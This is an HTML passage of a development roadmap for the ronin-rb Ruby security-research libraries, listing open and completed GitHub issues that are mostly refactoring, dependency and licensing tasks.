<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/139">Move yard dependency into the Gemfile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/135">Remove CLI::Printing#print_exception</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/134">Remove the ability to pass format strings to Printing methods</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/133">Add Printing.debug? and Printing.debug=</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/132">Remove ronin/spec/cli/printing</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/131">Remove verbose, normal, quiet, silent modes from CLI::Printing</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/129">Ruby 3.0 removed net/ftp from stdlib</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/128">Remove ronin/ui/output</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/127">Rename ronin/ui/printing to ronin/support/cli/printing</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/126">Remove Ronin::Mixin</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/122">Remove Ronin::UI::REPL and Ronin::UI::Shell</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/120">Add support for truffleruby</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/119">Move all files into the ronin/support/ directory</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/118">Rename extensions/ to core_ext/</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/117">Remove Ronin::Network::Mixins</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/116">Remove Mixin API</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/115">Remove parameters dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/88">Remove ronin/network/http/proxy (Ronin::Network::HTTP::Proxy)</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/77">Add an ANSI module to Ronin::CLI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/73">Remove Ronin::Wordlist</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-support/issues/72">Extract ronin/fuzzing from ronin-support</a></li>
</ul>
<h3 id="ronin-core"><a href="https://github.com/ronin-rb/ronin-core/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-core</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-core#readme">ronin-core</a> is a core library providing common functionality for all ronin
libraries.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-core/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/23">Add Ronin::Core::Metadata::References</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/22">Add Ronin::Core::Metadata::Author</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/21">Add Ronin::Core::Metadata::Summary</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/20">Add Ronin::Core::Metadata::Description</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/19">Support reading multi-line input in Ronin::Core::CLI::Shell.start</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/14">Add a Ronin::Core::CLI::TipCommand base class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/13">Add a TipFile class for parsing tips.yml files</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-core/issues/9">Add a Module Registry API</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/17">Add the ability of defining shell commands that have different method names than the command name</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/16">Add a sigil variable to Ronin::Core::CLI::Shell</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/15">Split Ronin::Core::CLI::Shell into Shell and CommandShell</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/12">Add tab-completion support to Ronin::Core::CLI::Shell</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/7">Add ANSI styling to the Ronin::Core::Shell prompt</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/6">Add ANSI styling to the Ronin::Core::Console prompt</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/3">Add Ronin::Core::Console using the new irb gem</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/4">Add more professional looking >>> message, *** warning, !!! error ANSI colored logging methods</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-core/issues/5">Add Ronin::Core::Shell</a></li>
</ul>
<h3 id="ronin-repos"><a href="https://github.com/ronin-rb/ronin-repos/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-repos</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a> provides a repository system for installing, managing, and
accessing third-party git repositories, which can contain code or other data.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-repos/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-repos/issues/8">Add methods to allow requiring a single file from a repository</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-repos/issues/7">Prefix all git methods in Repository with git_</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-repos/issues/6">Add a Repository#has_directory? method</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-repos/issues/5">Add Repository#has_file? method</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-repos/issues/4">Add the ability of detecting a Gemfile and running bundle install</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-repos/issues/3">Add an exec subcommand to ronin-repos</a></li>
</ul>
<h3 id="ronin-db"><a href="https://github.com/ronin-rb/ronin-db/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-db</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> is a database library for managing and querying security data.
ronin-db provides common ORM models for interacting with the database’s SQL
tables and querying/storing security data, such as URLs, email addresses,
host names, IPs, ports, etc. ronin-db also provides CLI commands for managing
the database(s).</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-db/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-db/issues/13">Convert option={} to keyword arguments</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-db/issues/8">Refactor Ronin::DB::CLI::Commands to use Ronin::Core::CLI::Command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-db/issues/6">Add truffleruby to the CI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-db/issues/3">Refactor ronin-db to use ActiveRecord</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-db/issues/15">Add models for storing Headers and form data in Ronin’s Database</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-db/issues/4">Add flavor property to OS</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/21">Add Ronin::DB::CLI::Command base class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/20">Remove bin/ronin-* files in favor of ronin-db subcommands</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/19">Update required_ruby_version to >= 2.7.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/18">Move all ruby files into the lib/ronin/db/ directory</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/17">Remove dm-visualizer and ruby-graphviz from the Gemfile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/16">Remove yard-dm dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/14">Change license to LGPL-3.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/12">Remove all DataMapper code/dependencies from the Gemfile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/11">Remove all dm-* dependencies</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/10">Refactor Ronin::DB::CLI to be a main command class CLI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/9">Rename ronin/ui/cli/Ronin::UI::CLI to ronin/db/cli/Ronin::DB::CLI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/7">Add ronin-core dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-db/issues/5">Add GitHub CI</a></li>
</ul>
<h3 id="ronin-code-asm"><a href="https://github.com/ronin-rb/ronin-code-asm/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-code-asm</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-code-asm#readme">ronin-code-asm</a> is a Ruby DSL for crafting Assmebly programs and Shellcode.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-asm/tree/1.0.0">1.0.0</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-code-asm/issues/20">Replace options={} with keyword arguments</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-code-asm/issues/17">Add truffleruby to the CI</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-code-asm/issues/19">Remove data_paths dependency</a></li>
</ul>
<h3 id="ronin-code-sql"><a href="https://github.com/ronin-rb/ronin-code-sql/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-code-sql</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-code-sql#readme">ronin-code-sql</a> is a Ruby DSL for crafting SQL Injections.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-code-sql/tree/2.0.0">2.0.0</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-code-sql/issues/8">Rename extensions directory to core_ext</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-code-sql/issues/7">Replace options={} with keyword arguments</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-code-sql/issues/9">Add a sql: keyword argument for selecting the SQL dialect</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-code-sql/issues/6">Switch rake console back to irb</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-code-sql/issues/5">Move yard dependency into the Gemfile</a></li>
</ul>
<h3 id="ronin-web-server"><a href="https://github.com/ronin-rb/ronin-web-server/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-web-server</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-web-server#readme">ronin-web-server</a> is a custom Ruby web server based on Sinatra tailored for
security research and development.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-web-server/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/17">Add support for the RONIN_HTTP_PROXY env variable</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/16">Add rack-user_agent as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/14">Replace print_debug statements in Ronin::Web::Proxy with Logger statements</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/12">Change default/preferred HTTP server to falcon?</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/11">Refactor the Proxy class to use async-http</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/9">Switch options={} to keyword arguments</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/4">Disable Rack::Protection in Ronin::Web::Proxy</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/15">Add webrick as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/13">Remove Ronin::Web::Server::Conditions::ClassMethods#campaign</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/10">Move Ronin::Web::Proxy into Ronin::Web::Server</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/3">Re-add project files</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-server/issues/1">Relicense as LGPL-3.0</a></li>
</ul>
<h3 id="ronin-web-spider"><a href="https://github.com/ronin-rb/ronin-web-spider/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-web-spider</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-web-spider#readme">ronin-web-spider</a> is a collection of common web spidering routines using the
spidr gem.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-web-spider/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-spider/issues/4">Add support for RONIN_HTTP_PROXY env variable</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-spider/issues/3">Add top-level methods for common spidering tasks</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-spider/issues/2">Re-add project files</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-spider/issues/1">Change license to LGPL-3.0</a></li>
</ul>
<h3 id="ronin-web-user_agents"><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-web-user_agents</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-web-user_agents#readme">ronin-web-user_agents</a> is yet another User-Agent randomiser library.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-web-user_agents/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues/7">Add top-level class-methods for the various categories</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues/6">Add a Category class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues/5">Add a method for building a custom User-Agent string</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues/4">Update User-Agent lists</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues/3">Replace the .yml file with multiple .txt and .csv files</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues/2">Re-add project files</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web-user_agents/issues/1">Change license to LGPL-3.0</a></li>
</ul>
<h3 id="ronin-web"><a href="https://github.com/ronin-rb/ronin-web/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-web</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a> is a Ruby library that provides support for web scraping and
spidering functionality.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-web/tree/1.0.0">1.0.0</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/59">Add a spider sub-command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/58">Add a server sub-command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/51">Add support for a RONIN_HTTP_PROXY env variable</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/39">Add a proxy command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/38">Add a MITM -> Browser Proxy command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/28">Add a diff sub-command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/26">Eventually re-add jruby to the CI matrix</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-web/issues/25">Eventually support truffleruby</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/57">Add a common Ronin::Web::CLI::Command base class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/56">Add ronin-core as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/55">Add nokogiri-ext as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/54">Add ronin-web-spider as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/53">Add ronin-web-user_agents as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/52">Remove ronin/web/extensions/nokogiri in favor of nokogiri-ext</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/50">Remove the ronin/web/user_agents.rb file in favor of the new ronin-web-user_agents gem</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/49">Remove ronin/web/spider in favor of the new ronin-web-spider gem</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/48">Extract ronin/web/spider out into its own library</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/47">Extract ronin/web/user_agents out into it’s own library</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/46">Extract ronin/web/extensions/nokogiri/ into it’s own library</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/44">Bump required_ruby_version to >= 2.7.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/43">Remove DataMapper/DM related code from Gemfile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/42">Remove the yard-parameters dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/41">Remove ronin/network/mixins/web</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/40">Add ronin-web-server as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/35">Remove ronin/web/proxy in favor of the new ronin-web-server dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/34">Remove ronin/web/server in favor of the ronin-web-server dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/32">Add a Ronin::Web::CLI class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/27">Add nokogiri-diff as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/24">Remove the yard* dependencies from the gemspec</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/23">Remove the ronin dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/22">Remove the data_paths dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/21">Rename extensions/ to core_ext/</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-web/issues/20">Extract Ronin::Web::Server out into ronin-web-server</a></li>
</ul>
<h3 id="ronin-fuzzer"><a href="https://github.com/ronin-rb/ronin-fuzzer/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-fuzzer</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-fuzzer#readme">ronin-fuzzer</a> is a Ruby library for generating, mutating, and fuzzing data.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-fuzzer/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-fuzzer/issues/6">Move in the ronin-fuzzer command from the ronin repo chore command</a></li>
